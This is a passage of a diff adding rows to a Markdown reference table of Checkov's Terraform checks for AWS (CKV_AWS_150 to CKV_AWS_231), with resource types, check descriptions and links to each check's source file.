+|  234 | CKV_AWS_150     | resource | aws_alb                                                 | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                                       |
+|  235 | CKV_AWS_150     | resource | aws_lb                                                  | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                                       |
+|  236 | CKV_AWS_152     | resource | aws_alb                                                 | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                         |
+|  237 | CKV_AWS_152     | resource | aws_lb                                                  | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                         |
+|  238 | CKV_AWS_153     | resource | aws_autoscaling_group                                   | Autoscaling groups should supply tags to launch configurations                                                                                                                                           | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py)                                                                                           |
+|  239 | CKV_AWS_154     | resource | aws_redshift_cluster                                    | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                                               |
+|  240 | CKV_AWS_155     | resource | aws_workspaces_workspace                                | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                                       |
+|  241 | CKV_AWS_156     | resource | aws_workspaces_workspace                                | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                                       |
+|  242 | CKV_AWS_157     | resource | aws_db_instance                                         | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py)                                                                                             |
+|  243 | CKV_AWS_158     | resource | aws_cloudwatch_log_group                                | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                                               |
+|  244 | CKV_AWS_159     | resource | aws_athena_workgroup                                    | Ensure that Athena Workgroup is encrypted                                                                                                                                                                | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py)                                                                             |
+|  245 | CKV_AWS_160     | resource | aws_timestreamwrite_database                            | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                                               |
+|  246 | CKV_AWS_161     | resource | aws_db_instance                                         | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py)                                                                                       |
+|  247 | CKV_AWS_162     | resource | aws_rds_cluster                                         | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                                         |
+|  248 | CKV_AWS_163     | resource | aws_ecr_repository                                      | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py)                                                                                               |
+|  249 | CKV_AWS_164     | resource | aws_transfer_server                                     | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py)                                                                                   |
+|  250 | CKV_AWS_165     | resource | aws_dynamodb_global_table                               | Ensure DynamoDB point in time recovery (backup) is enabled for global tables                                                                                                                             | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py)                                                                         |
+|  251 | CKV_AWS_166     | resource | aws_backup_vault                                        | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py)                                                                                       |
+|  252 | CKV_AWS_167     | resource | aws_glacier_vault                                       | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it                                                                                           | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py)                                                                               |
+|  253 | CKV_AWS_168     | resource | aws_sqs_queue                                           | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                           |
+|  254 | CKV_AWS_168     | resource | aws_sqs_queue_policy                                    | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                           |
+|  255 | CKV_AWS_169     | resource | aws_sns_topic_policy                                    | Ensure SNS topic policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py)                                                                           |
+|  256 | CKV_AWS_170     | resource | aws_qldb_ledger                                         | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                                             |
+|  257 | CKV_AWS_171     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encryption is using SSE-KMS                                                                                                                                    | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py)                                                                               |
+|  258 | CKV_AWS_172     | resource | aws_qldb_ledger                                         | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                                       |
+|  259 | CKV_AWS_173     | resource | aws_lambda_function                                     | Check encryption settings for Lambda environmental variable                                                                                                                                              | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                                         |
+|  260 | CKV_AWS_174     | resource | aws_cloudfront_distribution                             | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py)                                                                                                 |
+|  261 | CKV_AWS_175     | resource | aws_waf_web_acl                                         | Ensure WAF has associated rules                                                                                                                                                                          | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                                   |
+|  262 | CKV_AWS_175     | resource | aws_wafregional_web_acl                                 | Ensure WAF has associated rules                                                                                                                                                                          | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                                   |
+|  263 | CKV_AWS_175     | resource | aws_wafv2_web_acl                                       | Ensure WAF has associated rules                                                                                                                                                                          | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                                   |
+|  264 | CKV_AWS_176     | resource | aws_waf_web_acl                                         | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                           |
+|  265 | CKV_AWS_176     | resource | aws_wafregional_web_acl                                 | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                           |
+|  266 | CKV_AWS_177     | resource | aws_kinesis_video_stream                                | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py)                                                                       |
+|  267 | CKV_AWS_178     | resource | aws_fsx_ontap_file_system                               | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py)                                                                           |
+|  268 | CKV_AWS_179     | resource | aws_fsx_windows_file_system                             | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py)                                                                       |
+|  269 | CKV_AWS_180     | resource | aws_imagebuilder_component                              | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK)                                                                                                                    | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py)                                                     |
+|  270 | CKV_AWS_181     | resource | aws_s3_object_copy                                      | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py)                                                                       |
+|  271 | CKV_AWS_182     | resource | aws_docdb_cluster                                       | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py)                                                                                     |
+|  272 | CKV_AWS_183     | resource | aws_ebs_snapshot_copy                                   | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py)                                                                 |
+|  273 | CKV_AWS_184     | resource | aws_efs_file_system                                     | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py)                                                                     |
+|  274 | CKV_AWS_185     | resource | aws_kinesis_stream                                      | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py)                                                                     |
+|  275 | CKV_AWS_186     | resource | aws_s3_bucket_object                                    | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py)                                                                   |
+|  276 | CKV_AWS_187     | resource | aws_sagemaker_domain                                    | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py)                                                                 |
+|  277 | CKV_AWS_187     | resource | aws_sagemaker_notebook_instance                         | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py)                                                                 |
+|  278 | CKV_AWS_189     | resource | aws_ebs_volume                                          | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py)                                                                             |
+|  279 | CKV_AWS_190     | resource | aws_fsx_lustre_file_system                              | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py)                                                                               |
+|  280 | CKV_AWS_191     | resource | aws_elasticache_replication_group                       | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK)                                                                                                              | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py)                                         |
+|  281 | CKV_AWS_192     | resource | aws_wafv2_web_acl                                       | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py)                                                                                           |
+|  282 | CKV_AWS_193     | resource | aws_appsync_graphql_api                                 | Ensure AppSync has Logging enabled                                                                                                                                                                       | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py)                                                                                                   |
+|  283 | CKV_AWS_194     | resource | aws_appsync_graphql_api                                 | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                                     |
+|  284 | CKV_AWS_195     | resource | aws_glue_crawler                                        | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                               |
+|  285 | CKV_AWS_195     | resource | aws_glue_dev_endpoint                                   | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                               |
+|  286 | CKV_AWS_195     | resource | aws_glue_job                                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                               |
+|  287 | CKV_AWS_196     | resource | aws_elasticache_security_group                          | Ensure no aws_elasticache_security_group resources exist                                                                                                                                                 | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py)                                                                         |
+|  288 | CKV_AWS_197     | resource | aws_mq_broker                                           | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py)                                                                                       |
+|  289 | CKV_AWS_198     | resource | aws_db_security_group                                   | Ensure no aws_db_security_group resources exist                                                                                                                                                          | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py)                                                                                         |
+|  290 | CKV_AWS_199     | resource | aws_imagebuilder_distribution_configuration             | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK)                                                                                                  | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py)                     |
+|  291 | CKV_AWS_200     | resource | aws_imagebuilder_image_recipe                           | Ensure that Image Recipe EBS Disk are encrypted with CMK                                                                                                                                                 | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py)                                                         |
+|  292 | CKV_AWS_201     | resource | aws_memorydb_cluster                                    | Ensure MemoryDB is encrypted at rest using KMS CMKs                                                                                                                                                      | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py)                                                                             |
+|  293 | CKV_AWS_202     | resource | aws_memorydb_cluster                                    | Ensure MemoryDB data is encrypted in transit                                                                                                                                                             | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py)                                                           |
+|  294 | CKV_AWS_203     | resource | aws_fsx_openzfs_file_system                             | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py)                                                       |
+|  295 | CKV_AWS_204     | resource | aws_ami                                                 | Ensure AMIs are encrypted using KMS CMKs                                                                                                                                                                 | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py)                                                                                                     |
+|  296 | CKV_AWS_205     | resource | aws_ami_launch_permission                               | Ensure to Limit AMI launch Permissions                                                                                                                                                                   | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py)                                                                                             |
+|  297 | CKV_AWS_206     | resource | aws_api_gateway_domain_name                             | Ensure API Gateway Domain uses a modern security Policy                                                                                                                                                  | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py)                                                                                 |
+|  298 | CKV_AWS_207     | resource | aws_mq_broker                                           | Ensure MQ Broker minor version updates are enabled                                                                                                                                                       | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py)                                                                               |
+|  299 | CKV_AWS_208     | resource | aws_mq_broker                                           | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                                 |
+|  300 | CKV_AWS_208     | resource | aws_mq_configuration                                    | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                                 |
+|  301 | CKV_AWS_209     | resource | aws_mq_broker                                           | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK)                                                                                                                                     | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py)                                                                               |
+|  302 | CKV_AWS_210     | resource | aws_batch_job_definition                                | Batch job does not define a privileged container                                                                                                                                                         | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py)                                                                                 |
+|  303 | CKV_AWS_211     | resource | aws_db_instance                                         | Ensure RDS uses a modern CaCert                                                                                                                                                                          | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py)                                                                                             |
+|  304 | CKV_AWS_212     | resource | aws_dms_replication_instance                            | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK)                                                                                                                   | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py)                                                   |
+|  305 | CKV_AWS_213     | resource | aws_load_balancer_policy                                | Ensure ELB Policy uses only secure protocols                                                                                                                                                             | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py)                                                                       |
+|  306 | CKV_AWS_214     | resource | aws_appsync_api_cache                                   | Ensure AppSync API Cache is encrypted at rest                                                                                                                                                            | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py)                                                                 |
+|  307 | CKV_AWS_215     | resource | aws_appsync_api_cache                                   | Ensure AppSync API Cache is encrypted in transit                                                                                                                                                         | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py)                                                           |
+|  308 | CKV_AWS_216     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution is enabled                                                                                                                                                                | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py)                                                                     |
+|  309 | CKV_AWS_217     | resource | aws_api_gateway_deployment                              | Ensure Create before destroy for API deployments                                                                                                                                                         | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py)                                                 |
+|  310 | CKV_AWS_218     | resource | aws_cloudsearch_domain                                  | Ensure that CloudSearch is using latest TLS                                                                                                                                                              | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py)                                                                                       |
+|  311 | CKV_AWS_219     | resource | aws_codepipeline                                        | Ensure CodePipeline Artifact store is using a KMS CMK                                                                                                                                                    | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py)                                                                   |
+|  312 | CKV_AWS_220     | resource | aws_cloudsearch_domain                                  | Ensure that CloudSearch is using https                                                                                                                                                                   | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py)                                                                     |
+|  313 | CKV_AWS_221     | resource | aws_codeartifact_domain                                 | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py)                                                           |
+|  314 | CKV_AWS_222     | resource | aws_dms_replication_instance                            | Ensure DMS replication instance gets all minor upgrade automatically                                                                                                                                     | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py)                                                           |
+|  315 | CKV_AWS_223     | resource | aws_ecs_cluster                                         | Ensure ECS Cluster enables logging of ECS Exec                                                                                                                                                           | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py)                                                                               |
+|  316 | CKV_AWS_224     | resource | aws_ecs_cluster                                         | Ensure ECS Cluster logging is enabled and client to container communication uses CMK                                                                                                                     | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py)                                                             |
+|  317 | CKV_AWS_225     | resource | aws_api_gateway_method_settings                         | Ensure API Gateway method setting caching is enabled                                                                                                                                                     | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py)                                                       |
+|  318 | CKV_AWS_226     | resource | aws_db_instance                                         | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                                   |
+|  319 | CKV_AWS_226     | resource | aws_rds_cluster_instance                                | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                                   |
+|  320 | CKV_AWS_227     | resource | aws_kms_key                                             | Ensure KMS key is enabled                                                                                                                                                                                | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py)                                                                                                 |
+|  321 | CKV_AWS_228     | resource | aws_elasticsearch_domain                                | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                                   |
+|  322 | CKV_AWS_228     | resource | aws_opensearch_domain                                   | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                                   |
+|  323 | CKV_AWS_229     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                                 |
+|  324 | CKV_AWS_229     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                                 |
+|  325 | CKV_AWS_230     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                                 |
+|  326 | CKV_AWS_230     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                                 |
+|  327 | CKV_AWS_231     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                             |
+|  328 | CKV_AWS_231     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                             |
